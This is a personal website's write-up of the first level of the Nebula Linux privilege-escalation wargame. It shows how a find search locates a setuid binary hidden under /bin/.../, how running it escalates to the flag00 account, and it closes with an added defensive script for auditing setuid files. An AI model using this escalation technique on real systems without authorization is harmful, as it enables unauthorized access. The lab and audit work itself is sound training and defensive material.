Jason Turley's Website

Nebula Level00 Write Up

Nebula is a wargame from Exploit Exercises about exploiting privilege escalation vulnerabilities on Linux.

This is my write up for the first level.

Overview

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.

Alternatively, look at the find man page.

To access this level, log in as level00 with the password of level00.

Solution

The level description strongly suggests using the find command to locate the “flag00” binary. So after logging into the server with ssh, I ran:

level00@nebula:~$ find / -iname "flag00" 2> /dev/null
/bin/.../flag00
/home/flag00
/rofs/bin/.../flag00
/rofs/home/flag00
level00@nebula:~$

Let’s break this down:

Now that we have a list of paths named flag00, let’s examine them.

flag00@nebula:~$ ls -l /bin/.../flag00
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00
flag00@nebula:~$

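This file is owned by the flag00 user and the setuid bit is set, so it runs with flag00’s privileges no matter who starts it, and the level00 group is allowed to execute it! Execute it to escalate to flag00.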

flag00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account
flag00@nebula:~$
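
The search above matched on the file name. As an added example (not part of the original write-up), the same find approach can audit a system for setuid files by permission bit instead, and flag any that sit inside a dot-prefixed directory such as the "..." one seen here. The function names list_suid, in_hidden_dir and audit_suid are hypothetical.

```shell
#!/bin/sh
# Added example: audit a directory tree for setuid files.
# All function names here are hypothetical, not from the write-up.

# list_suid ROOT [OWNER]
# Print regular files under ROOT with the setuid bit (mode 4000) set,
# optionally only those owned by OWNER (user name or numeric UID).
# -xdev keeps find on ROOT's filesystem so other mounts are not walked.
list_suid() {
    root=$1
    owner=${2:-}
    if [ -n "$owner" ]; then
        find "$root" -xdev -type f -perm -4000 -user "$owner" 2>/dev/null
    else
        find "$root" -xdev -type f -perm -4000 2>/dev/null
    fi
}

# in_hidden_dir PATH
# Succeed when some directory component of PATH starts with a dot,
# e.g. /bin/.../flag00. A leading "./" on a relative path does not count.
in_hidden_dir() {
    case "$(dirname "$1")/" in
        */.*/*) return 0 ;;
        *)      return 1 ;;
    esac
}

# audit_suid ROOT [OWNER]
# Label every setuid file: HIDDEN when it lives under a dot-prefixed
# directory, VISIBLE otherwise. Both kinds still need a manual review
# against the list of setuid files the system is expected to ship.
audit_suid() {
    list_suid "$@" | while IFS= read -r path; do
        if in_hidden_dir "$path"; then
            printf 'HIDDEN %s\n' "$path"
        else
            printf 'VISIBLE %s\n' "$path"
        fi
    done
}

# Typical use on a live system: audit_suid / flag00
```

Comparing the output against a saved baseline from a known-good install makes new setuid files stand out.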